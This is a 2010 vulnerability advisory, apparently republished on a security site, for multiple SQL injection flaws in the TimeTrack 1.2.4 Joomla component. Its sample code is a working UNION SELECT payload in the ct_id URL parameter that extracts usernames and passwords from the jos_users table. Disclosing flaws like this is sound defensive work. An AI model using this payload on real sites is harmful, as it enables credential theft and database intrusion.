TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities

2011.10.13
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities Name TimeTrack Vendor http://www.itrn.de Versions Affected 1.2.4 Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2010-09-22 X. INDEX I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX I. ABOUT THE APPLICATION ________________________ TimeTrack is a time tracking Component for Joomla! 1.5 to collect, categorize and evaluate working hours and services. Monthly Reports can generated and exported as PDF or CSV-File. II. DESCRIPTION _______________ Many numeric parameters are not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. III. ANALYSIS _____________ Summary: A) Multiple SQL Injection A) Multiple SQL Injection _________________________ Each module is vulnerable to SQL Injection because all numeric fields are not sanitised. IV. SAMPLE CODE _______________ A) Multiple SQL Injection http://host/path/components/index.php?option=com_timetrack&view=timetrac k&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users V. FIX ______ No fix.

References:

http://www.securityfocus.com/archive/1/archive/1/513905/100/0/threaded
http://www.exploit-db.com/exploits/15084
http://timetrack.itrn.de/
http://secunia.com/advisories/41583
http://salvatorefresta.net/files/adv/TimeTrack_1.2.4_Joomla_Component_Multiple_SQL_Injection_Vulnerabilities-22092010.txt
http://packetstormsecurity.org/1009-exploits/joomlatimetrack-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top